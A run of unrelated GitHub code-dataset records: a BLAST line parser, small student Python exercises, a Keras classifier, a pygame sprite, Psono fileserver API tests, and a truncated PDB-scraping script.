.cblast.BlastLine, which may be up to 2x faster\n\"\"\"\n\n\nclass BlastLine(object):\n __slots__ = (\n \"query\",\n \"subject\",\n \"pctid\",\n \"hitlen\",\n \"nmismatch\",\n \"ngaps\",\n \"qstart\",\n \"qstop\",\n \"sstart\",\n \"sstop\",\n \"evalue\",\n \"score\",\n \"qseqid\",\n \"sseqid\",\n \"qi\",\n \"si\",\n \"orientation\",\n )\n\n def __init__(self, sline):\n 
args = sline.split(\"\\t\")\n self.query = args[0]\n self.subject = args[1]\n self.pctid = float(args[2])\n self.hitlen = int(args[3])\n self.nmismatch = int(args[4])\n self.ngaps = int(args[5])\n self.qstart = int(args[6])\n self.qstop = int(args[7])\n self.sstart = int(args[8])\n self.sstop = int(args[9])\n if len(args) > 10:\n self.evalue = float(args[10])\n self.score = float(args[11])\n\n self.orientation = \"+\"\n if self.qstart > self.qstop:\n self.qstart, self.qstop = self.qstop, self.qstart\n self.orientation = \"-\"\n if self.sstart > self.sstop:\n self.sstart, self.sstop = self.sstop, self.sstart\n self.orientation = \"-\"\n\n @property\n def has_score(self):\n return hasattr(self, \"score\")\n\n def __repr__(self):\n return \"BlastLine('%s' to '%s', eval=%.3f, score=%.1f)\" % (\n self.query,\n self.subject,\n self.evalue,\n self.score,\n )\n\n def __str__(self):\n if self.has_score:\n args = [getattr(self, attr) for attr in BlastLine.__slots__[:12]]\n else:\n args = [getattr(self, attr) for attr in BlastLine.__slots__[:10]]\n if self.orientation == \"-\":\n args[8], args[9] = args[9], args[8]\n return \"\\t\".join(str(x) for x in args)\n\n @property\n def swapped(self):\n \"\"\"\n Swap query and subject.\n \"\"\"\n args = [getattr(self, attr) for attr in BlastLine.__slots__[:12]]\n args[0:2] = [self.subject, self.query]\n args[6:10] = [self.sstart, self.sstop, self.qstart, self.qstop]\n if self.orientation == \"-\":\n args[8], args[9] = args[9], args[8]\n b = \"\\t\".join(str(x) for x in args)\n return BlastLine(b)\n\n @property\n def bedline(self):\n return \"\\t\".join(\n str(x)\n for x in (\n self.subject,\n self.sstart - 1,\n self.sstop,\n self.query,\n self.score,\n self.orientation,\n )\n )\n","repo_name":"tanghaibao/jcvi","sub_path":"jcvi/formats/pyblast.py","file_name":"pyblast.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","stars":634,"dataset":"github-code","pt":"78"} +{"seq_id":"24874297478","text":"#Daniel Nocon\r\n#Project 2\r\n#Problem 3. 
(Playing Card ) Write a program called card.py that simulates the selection of a random card from a standard\r\n#deck of 52 playing cards, and writes it to standard output.\r\n\r\nimport stdio\r\nimport stdrandom #importing to imitate pulling a random card\r\n\r\n#assigning variables for card and suit\r\nrank = stdrandom.uniformInt(2,15) #assigns the value of the card\r\nsuit = stdrandom.uniformInt(1,5) #assigns the suit of the card\r\n\r\n#control flow if statement to convert value of card to string\r\nif rank == 2:\r\n rankStr = \"2\"\r\nelif rank == 3:\r\n rankStr = \"3\"\r\nelif rank == 4:\r\n rankStr = \"4\"\r\nelif rank == 5:\r\n rankStr = \"5\"\r\nelif rank == 6:\r\n rankStr = \"6\"\r\nelif rank == 7:\r\n rankStr = \"7\"\r\nelif rank == 8:\r\n rankStr = \"8\"\r\nelif rank == 9:\r\n rankStr = \"9\"\r\nelif rank == 10:\r\n rankStr = \"10\"\r\nelif rank == 11:\r\n rankStr = \"Jack\"\r\nelif rank == 12:\r\n rankStr = \"Queen\"\r\nelif rank == 13:\r\n rankStr = \"King\"\r\nelse:\r\n rankStr = \"Ace\"\r\n\r\n#control flow if statement to convert value to suit of card\r\nsuit = stdrandom.uniformInt(1,5)\r\nif suit == 1:\r\n suitStr = \"Clubs\"\r\nelif suit == 2:\r\n suitStr = \"Diamonds\"\r\nelif suit == 3:\r\n suitStr = \"Hearts\"\r\nelse:\r\n suitStr = \"Spades\"\r\n\r\n#prints the string conversion of rank and suit to a card from standard 52 card deck\r\nstdio.writeln(rankStr + \" of \" + suitStr)","repo_name":"skillipino/CS110","sub_path":"card.py","file_name":"card.py","file_ext":"py","file_size_in_byte":1377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4919180769","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\nfrom data_parser import load_data\n\ndef make_network():\n \"\"\"\n Create the neural network using Keras, returns an untrained network\n \"\"\"\n my_net = tf.keras.models.Sequential()\n\n my_net.add(tf.keras.layers.Dense(15, input_shape = (15,), activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(30, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(50, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(30, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(15, activation = 'relu'))\n\n my_net.add(tf.keras.layers.Dense(10, activation = None))\n my_net.add(tf.keras.layers.Flatten())\n\n my_net.add(tf.keras.layers.Dense(1, activation = 'sigmoid'))\n\n my_net.compile(loss = 'binary_crossentropy' , optimizer = 'adam' , metrics = ['accuracy'])\n return my_net\n\ndef analyze_data(model, X, y):\n \"\"\"\n args:\n model - Keras sequential model\n X - features numpy array (N_samples, N_features)\n y - labels (N_samples, 1)\n\n returns: \n trained model\n two plots:\n - Accuracy v. Epochs\n - Loss v. 
Epochs\n \"\"\"\n history = model.fit(X, y, epochs = 200, validation_split=0.4)\n # Plot training & validation accuracy values\n plt.plot(history.history['accuracy'])\n plt.plot(history.history['val_accuracy'])\n plt.title('Model accuracy')\n plt.ylabel('Accuracy')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n\n # Plot training & validation loss values\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('Model loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.legend(['Train', 'Test'], loc='upper left')\n plt.show()\n return model\n\ndef __main__():\n \"\"\"\n Creates, trains, and saves a neural network using the stored data\n \"\"\"\n model = make_network()\n\n X, y = load_data(\"pres12.pkl\")\n Xp, yp = load_data(\"pres16.pkl\")\n X = np.concatenate((X, Xp), axis = 0)\n y = np.concatenate((y, yp), axis = 0)\n\n new_model = analyze_data(model, X, y)\n new_model.save('my_new_model.h5')","repo_name":"JaredMGoldman/ML-Final-Project","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":2196,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32027696253","text":"import pygame\nfrom pygame.locals import *\nfrom random import choices, randint\n\nclass Sprite(pygame.sprite.Sprite):\n def __init__(self, screen, colour, width, height, entityKey):\n super().__init__()\n\n self.screen = screen\n self.colour = colour\n self.width = width\n self.height = height\n\n self.entityKey = entityKey\n\n def spawn(self, abs_x, abs_y, abs_origin_vect):\n self.abs_x = abs_x\n self.abs_y = abs_y\n\n x = abs_x + abs_origin_vect.x\n y = abs_y + abs_origin_vect.y\n\n self.rect = pygame.Rect(x, y, self.width, self.height)\n\n def draw(self):\n pygame.draw.rect(self.screen, self.colour, self.rect)\n\n def despawn(self):\n self.kill()\n del self.rect\n \n def moveto(self, x, y):\n self.rect.x = x\n self.rect.y = y\n \n\n#[Temp player sprite] =================================================================\nclass Player(Sprite):\n def __init__(self, screen, colour, width, height):\n super().__init__(screen, colour, width, height, \"player\")\n\n self.speed = 3\n self.sprint = False\n self.jittering = [1, 0]\n \n def moveLeft(self):\n self.rect.x -= self.speed\n self.moved = True\n\n def moveRight(self):\n self.rect.x += self.speed\n self.moved = True\n \n def moveUp(self):\n self.rect.y -= self.speed\n self.moved = True\n \n def moveDown(self):\n self.rect.y += self.speed\n self.moved = True\n\n def handle_movement(self, keys, fatigued):\n self.moved = False\n\n if choices((True, False), self.jittering[0 : 2], k = 1)[0]:\n if keys[K_SPACE] and not fatigued:\n self.speed = 8\n self.sprint = True\n else:\n self.speed = 3\n self.sprint = False\n\n\n if keys[K_LEFT]:\n self.moveLeft()\n if keys[K_RIGHT]:\n self.moveRight()\n if keys[K_UP]:\n self.moveUp()\n if keys[K_DOWN]:\n self.moveDown()\n else:\n randMovementChoice = randint(0, 4)\n\n maxJitterSpeed = self.jittering[2]\n if maxJitterSpeed >= 3:\n if fatigued or choices((True, False), (maxJitterSpeed, 2), k = 1)[0]:\n self.speed = 3\n self.sprint = False\n else:\n self.speed = maxJitterSpeed\n self.sprint = True\n else:\n self.speed = maxJitterSpeed\n\n\n if randMovementChoice == 1:\n self.moveLeft()\n if randMovementChoice == 2:\n self.moveRight()\n if randMovementChoice == 3:\n self.moveUp()\n if randMovementChoice == 4:\n 
self.moveDown()\n#======================================================================================","repo_name":"AndrewZ-0/MCS_simulator","sub_path":"sprite.py","file_name":"sprite.py","file_ext":"py","file_size_in_byte":2948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18215560385","text":"from django.urls import reverse\nfrom django.conf import settings\nfrom django.contrib.auth.hashers import make_password\nfrom django.utils import timezone\nfrom datetime import timedelta\nfrom rest_framework import status\n\nfrom restapi import models\nfrom restapi.authentication import TokenAuthentication\nfrom restapi.renderers import encrypt\nfrom restapi.utils import encrypt_with_db_secret\n\nfrom restapi.tests.base import APITestCaseExtended\n\nimport binascii\nimport random\nimport string\nimport os\nimport json\nimport datetime\n\nimport nacl.encoding\nimport nacl.utils\nimport nacl.secret\nfrom nacl.public import PrivateKey\n\n\nclass RevokeDownloadTests(APITestCaseExtended):\n\n def setUp(self):\n\n self.test_email = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@example.com'\n self.test_email_bcrypt = 'a'\n self.test_username = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_authkey = binascii.hexlify(os.urandom(settings.AUTH_KEY_LENGTH_BYTES)).decode()\n self.test_public_key = binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode()\n self.test_private_key = binascii.hexlify(os.urandom(settings.USER_PRIVATE_KEY_LENGTH_BYTES)).decode()\n self.test_private_key_nonce = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_secret_key = binascii.hexlify(os.urandom(settings.USER_SECRET_KEY_LENGTH_BYTES)).decode()\n self.test_secret_key_nonce = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_user_sauce = 'd22f5797cfd438f212bb0830da488f0555487697ad4041bbcbf5b08bc297e117'\n self.test_user_obj = models.User.objects.create(\n email=self.test_email,\n email_bcrypt=self.test_email_bcrypt,\n username=self.test_username,\n authkey=make_password(self.test_authkey),\n public_key=self.test_public_key,\n private_key=self.test_private_key,\n private_key_nonce=self.test_private_key_nonce,\n secret_key=self.test_secret_key,\n secret_key_nonce=self.test_secret_key_nonce,\n user_sauce=self.test_user_sauce,\n is_email_active=True\n )\n\n self.test_email2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@example.com'\n self.test_email_bcrypt2 = \"b\"\n self.test_username2 = ''.join(random.choice(string.ascii_lowercase) for _ in range(10)) + 'test@psono.pw'\n self.test_authkey2 = binascii.hexlify(os.urandom(settings.AUTH_KEY_LENGTH_BYTES)).decode()\n self.test_public_key2 = binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode()\n self.test_private_key2 = binascii.hexlify(os.urandom(settings.USER_PRIVATE_KEY_LENGTH_BYTES)).decode()\n self.test_private_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_secret_key2 = binascii.hexlify(os.urandom(settings.USER_SECRET_KEY_LENGTH_BYTES)).decode()\n self.test_secret_key_nonce2 = binascii.hexlify(os.urandom(settings.NONCE_LENGTH_BYTES)).decode()\n self.test_user_sauce2 = 'a67fef1ff29eb8f866feaccad336fc6311fa4c71bc183b14c8fceff7416add99'\n self.test_user_obj2 = models.User.objects.create(\n username=self.test_username2,\n email=encrypt_with_db_secret(self.test_email2),\n 
email_bcrypt=self.test_email_bcrypt2,\n authkey=make_password(self.test_authkey2),\n public_key=self.test_public_key2,\n private_key=self.test_private_key2,\n private_key_nonce=self.test_private_key_nonce2,\n secret_key=self.test_secret_key2,\n secret_key_nonce=self.test_secret_key_nonce2,\n user_sauce=self.test_user_sauce2,\n is_email_active=True\n )\n\n self.user_token = ''.join(random.choice(string.ascii_lowercase) for _ in range(64))\n self.user_db_token = models.Token.objects.create(\n key=TokenAuthentication.user_token_to_token_hash(self.user_token),\n user=self.test_user_obj,\n secret_key = binascii.hexlify(os.urandom(32)).decode(),\n valid_till=timezone.now() + timedelta(seconds=10),\n active=True,\n )\n # Create Fileserver\n box = PrivateKey.generate()\n self.cluster_private_key_hex = box.encode(encoder=nacl.encoding.HexEncoder).decode()\n self.cluster_public_key_hex = box.public_key.encode(encoder=nacl.encoding.HexEncoder).decode()\n\n private_key = encrypt_with_db_secret(self.cluster_private_key_hex)\n public_key = encrypt_with_db_secret(self.cluster_public_key_hex)\n\n self.cluster1 = models.Fileserver_Cluster.objects.create(\n title='Some Fileserver Cluster Title',\n auth_public_key=public_key,\n auth_private_key=private_key,\n file_size_limit=0,\n )\n\n self.shard1 = models.Fileserver_Shard.objects.create(\n title='Some Shard Title',\n description='Some Shard Description',\n )\n\n self.link1 = models.Fileserver_Cluster_Shard_Link.objects.create(\n cluster=self.cluster1,\n shard=self.shard1,\n read=True,\n write=True,\n )\n\n token_hash = TokenAuthentication.user_token_to_token_hash('abc')\n self.fileserver1 = models.Fileserver_Cluster_Members.objects.create(\n create_ip='127.0.0.1',\n fileserver_cluster=self.cluster1,\n key=token_hash,\n public_key=binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode(),\n secret_key=binascii.hexlify(os.urandom(settings.USER_PUBLIC_KEY_LENGTH_BYTES)).decode(),\n url='https://fs01.example.com/fileserver',\n read=True,\n write=True,\n delete_capability=True,\n valid_till=timezone.now() + datetime.timedelta(seconds=30),\n )\n\n models.Fileserver_Cluster_Member_Shard_Link.objects.create(\n shard=self.shard1,\n member=self.fileserver1,\n read=True,\n write=True,\n delete_capability=True,\n ip_read_whitelist=json.dumps([]),\n ip_read_blacklist=json.dumps([]),\n ip_write_whitelist=json.dumps([]),\n ip_write_blacklist=json.dumps([]),\n )\n\n self.file_size = 140\n\n self.file = models.File.objects.create(\n shard=self.shard1,\n file_repository_id=None,\n chunk_count=1,\n size=self.file_size,\n user=self.test_user_obj,\n )\n\n self.file_transfer = models.File_Transfer.objects.create(\n user=self.test_user_obj,\n shard=self.shard1,\n file_repository_id=self.file.file_repository_id,\n file=self.file,\n size=self.file_size,\n size_transferred=self.file_size,\n chunk_count=1,\n chunk_count_transferred=1,\n credit=0,\n type='download',\n )\n\n self.hash_checksum = 'abc'\n self.file_chunk = models.File_Chunk.objects.create(\n user=self.test_user_obj,\n file=self.file,\n hash_checksum=self.hash_checksum,\n position=1,\n size=self.file_size,\n )\n\n\n def test_successful(self):\n \"\"\"\n Tests revoke download successful\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n chunk_size = self.file_size\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 
'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_200_OK)\n\n refreshed_file_transfer = models.File_Transfer.objects.get(pk=self.file_transfer.id)\n\n self.assertEqual(self.file_transfer.size_transferred - chunk_size, refreshed_file_transfer.size_transferred)\n self.assertEqual(self.file_transfer.chunk_count_transferred - 1, refreshed_file_transfer.chunk_count_transferred)\n\n\n def test_failure_file_transfer_id_not_provided(self):\n \"\"\"\n Tests revoke download failure with file transfer id not being provided\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n # 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_file_transfer_id_invalid(self):\n \"\"\"\n Tests revoke download failure with a token that does not exist\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': 'abc',\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_token_decryption_error(self):\n \"\"\"\n Tests revoke download failure with token that cannot be decrypted\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n self.file_transfer.secret_key = binascii.hexlify(os.urandom(32)).decode()\n self.file_transfer.save()\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_hash_checksum_not_in_ticket(self):\n \"\"\"\n Tests revoke download failure with the hash checksum not being part of the ticket\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n # 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n 
self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_file_transfer_id_not_exist(self):\n \"\"\"\n Tests revoke download failure with a not existing file transfer\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': '6e92cf15-f1ad-4047-a504-39ff2e2ef4f1',\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_file_transfer_not_being_a_download(self):\n \"\"\"\n Tests revoke download failure with the file transfer not having the type \"download\"\n \"\"\"\n\n self.file_transfer.type = 'upload'\n self.file_transfer.save()\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_fileserver_unauthenticated(self):\n \"\"\"\n Tests revoke download failure with the file server being unauthenticated\n \"\"\"\n\n models.Fileserver_Cluster_Member_Shard_Link.objects.all().delete()\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': self.hash_checksum,\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n\n\n def test_failure_chunk_hash_not_exists(self):\n \"\"\"\n Tests revoke download failure for a chunk (identified by its hash) that does not exist\n \"\"\"\n\n url = reverse('fileserver_revoke_download')\n\n ticket_decrypted = {\n 'hash_checksum': 'abcdef',\n }\n\n ticket_encrypted = encrypt(self.file_transfer.secret_key, json.dumps(ticket_decrypted).encode())\n\n data = {\n 'file_transfer_id': self.file_transfer.id,\n 'ip_address': '127.0.0.1',\n 'ticket': ticket_encrypted['text'].decode(),\n 'ticket_nonce': ticket_encrypted['nonce'].decode(),\n }\n\n self.client.force_authenticate(user=self.fileserver1)\n response = self.client.put(url, data)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)","repo_name":"psono/psono-server","sub_path":"psono/fileserver/tests/revoke_download.py","file_name":"revoke_download.py","file_ext":"py","file_size_in_byte":15495,"program_lang":"python","lang":"en","doc_type":"code","stars":67,"dataset":"github-code","pt":"78"} +{"seq_id":"14666581446","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Mar 25 10:53:42 2019\r\n\r\n@author: 
DHANUSH\r\n\"\"\"\r\n\r\nimport os,datetime, time, os.path,codecs,base64,webbrowser\r\nfrom socket import*\r\n\r\nserver='127.0.0.1'\r\nsport=8000\r\ndataLen=10000000\r\n#instructors hint\r\ndef getDate(filename):\r\n secs = os.path.getmtime(\"filename.html\") \r\n t = time.gmtime(secs)\r\n last_mod_time = time.strftime(\"%a, %d %b %Y %H:%M:%S GMT\", t)\r\n return last_mod_time\r\n\r\n\r\n#mickey696 github\r\ndef getData(filename):\r\n Data=\"\"\r\n with open(filename,\"r\") as f:\r\n for line in f.readlines():\r\n if '
' in line:\r\n Data+=line\r\n Data=Data.replace('
', '')\r\n Data=Data.replace('
','')\r\n Data=Data.replace('<','<')\r\n Data=Data.replace('>','>')\r\n return Data\r\n \r\n \r\nserverSocket=socket(AF_INET, SOCK_STREAM)\r\n\r\nserverSocket.bind((server, sport))\r\n\r\n# Listen for incoming connection requests\r\n\r\n\r\n\r\nserverSocket.listen(1)\r\nprint('The server is ready to serve on port: ' + str(sport))\r\n\r\nwhile True:\r\n Lmdto=\"\"\r\n ResponseData=''\r\n connectionSocket, address = serverSocket.accept()\r\n \r\n \r\n RequestData = connectionSocket.recv(dataLen).decode()\r\n \r\n t = datetime.datetime.utcnow()\r\n RequestDateTime = t.strftime(\"%a, %d %b %Y %H:%M:%S GMT\")\r\n print(\"REQUEST MESSAGE RECIEVED\")\r\n print()\r\n \r\n print(RequestData)\r\n\r\n\r\n for item in RequestData.split():\r\n if item[0]==\"/\":\r\n filename=item[1:]\r\n break\r\n #stack overflow\r\n if not(os.path.isfile(filename)):\r\n \r\n notFound=\"HTTP/1.1 404 Not Found\" + \"\\r\\n\"+\"Date: \" + RequestDateTime + \"\\r\\n\"+\"\\r\\n\"\r\n connectionSocket.send(notFound.encode())\r\n\r\n \r\n \r\n else:\r\n \r\n LMDTC = getDate(filename)\r\n \r\n for lines in RequestData.splitlines():\r\n if \"If-Modified-Since\" in lines:\r\n Lmdto=lines[15:] \r\n \r\n if LMDTC in Lmdto:\r\n \r\n notModified=\"HTTP/1.1 304 Not Modified\\r\\n\"+\"Date: \" + RequestDateTime + \"\\r\\n\"+\"\\r\\n\"\r\n connectionSocket.send(notModified.encode())\r\n else:\r\n ContentData = getData(filename)\r\n ContentLength = str(len(ContentData))\r\n OK=\"HTTP/1.1 200 OK\" + \"\\r\\n\"+\"Date: \" + RequestDateTime + \"\\r\\n\"+\"Last-Modified: \" + LMDTC + \"\\r\\n\"+\"Content-Length: \" + ContentLength + \"\\r\\n\"+\"Content-Type: text/html; charset=UTF-8\" + \"\\r\\n\"+\"\\r\\n\" + ContentData\r\n connectionSocket.send(OK.encode())\r\n\r\n\r\n\r\n\r\n connectionSocket.close()\r\n","repo_name":"danyb12/computerNetworks","sub_path":"homework/Homework3/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26956279542","text":"# # https://leetcode.com/problems/sign-of-the-product-of-an-array/\n\n# 1822. Sign of the Product of an Array\n# Easy\n# 2.1K\n# 205\n# Companies\n# There is a function signFunc(x) that returns:\n\n# 1 if x is positive.\n# -1 if x is negative.\n# 0 if x is equal to 0.\n# You are given an integer array nums. 
Let product be the product of all values in the array nums.\n\n# Return signFunc(product).\n\n \n\n# Example 1:\n\n# Input: nums = [-1,-2,-3,-4,3,2,1]\n# Output: 1\n# Explanation: The product of all values in the array is 144, and signFunc(144) = 1\n# Example 2:\n\n# Input: nums = [1,5,0,2,-3]\n# Output: 0\n# Explanation: The product of all values in the array is 0, and signFunc(0) = 0\n# Example 3:\n\n# Input: nums = [-1,1,-1,1,-1]\n# Output: -1\n# Explanation: The product of all values in the array is -1, and signFunc(-1) = -1\n\nfrom typing import List\ndef sign_of_product_an_array(nums: List[int]) -> int:\n ans=1\n for x in nums:\n if x == 0:\n return 0\n if x < 0:\n ans *= -1\n return ans\n\n\n\nif __name__ == \"__main__\":\n #nums = [-1,-2,-3,-4,3,2,1]\n nums = [-1,1,-1,1,-1]\n print (\"{}\".format(sign_of_product_an_array(nums)))\n","repo_name":"smohapatra1/scripting","sub_path":"python/practice/start_again/2023/11072023/sign_of_the_product_of_an_array.py","file_name":"sign_of_the_product_of_an_array.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70984471612","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Mar 23 18:00:52 2020\r\n\r\n@author: Yunpeng Cheng\r\n\r\nE_mail: ycheng22@hotmail.com\r\n\r\nReference:\r\n\"\"\"\r\nimport time\r\ntic = time.time()\r\nfrom multiprocessing.dummy import Pool as ThreadPool\r\nfrom http.client import IncompleteRead\r\nimport sys\r\n#import sub_func #include read_url(), \r\nimport pypdb as pyb #this is a package as pdb API,https://github.com/williamgilpin/pypdb\r\nimport urllib.request\r\nimport pandas as pd\r\nimport numpy as np\r\nimport yagmail\r\nimport warnings\r\nwarnings.filterwarnings(\"ignore\")\r\n#----------------------------------------------------------------------------\r\nopener = urllib.request.build_opener()\r\nopener.addheaders =[('User-agent', 'Mozilla/49.0.2')]\r\n#----------------------------------------------------------------------------\r\ndef read_url(id): #read one pdb's content\r\n url_beg='https://files.rcsb.org/view/'\r\n url_end='.pdb'\r\n url=url_beg+id+url_end\r\n fill_str=' '*20\r\n arr_store=np.full(17, fill_str)\r\n arr_store[0]=id \r\n try:\r\n try_open=opener.open(url)\r\n content = try_open.read().decode('utf-8')\r\n ct=content.split(\"\\n\")\r\n arr_store[1]=ct[0][10:49].rstrip() #header\r\n arr_store[2]=ct[0][50:59] #date\r\n for ln in ct: \r\n if (\"CRYST1\" in ln) & (\"REMARK\" not in ln): \r\n arr_store[3]=ln[6:15].lstrip() #a\r\n arr_store[4]=ln[15:24].lstrip() #b\r\n arr_store[5]=ln[24:33].lstrip() #c\r\n arr_store[6]=ln[33:40].lstrip() #alpha\r\n arr_store[7]=ln[40:47].lstrip() #beta\r\n arr_store[8]=ln[47:54].lstrip() #gamma\r\n arr_store[9]=ln[54:65].strip() #space group\r\n continue\r\n \r\n if (\"RESOLUTION RANGE HIGH (ANGSTROMS)\" in ln): #REMARK 3 RESOLUTION RANGE HIGH (ANGSTROMS) : 2.85 \r\n arr_store[10]=ln[49:55].rstrip() #reso high\r\n continue\r\n if (\"RESOLUTION RANGE LOW (ANGSTROMS)\" in ln): \r\n arr_store[11]=ln[49:55].rstrip() #reso low\r\n continue\r\n if (\"SOLVENT CONTENT\" in ln): \r\n arr_store[12]=ln[38:-20].rstrip() #solvent content\r\n continue\r\n if (\"COMPND\" in ln) & (\"CHAIN\" in ln):#in .pdb: COMPND 3 CHAIN: A; \r\n arr_store[13]=ln[18:-10].replace(';','').rstrip() #chain names\r\n continue\r\n if (\"PROTEIN ATOMS \" in ln): \r\n arr_store[14]=ln[40:-15].rstrip() #number of protein atoms\r\n continue\r\n if (\"FROM WILSON PLOT\" in ln): \r\n 
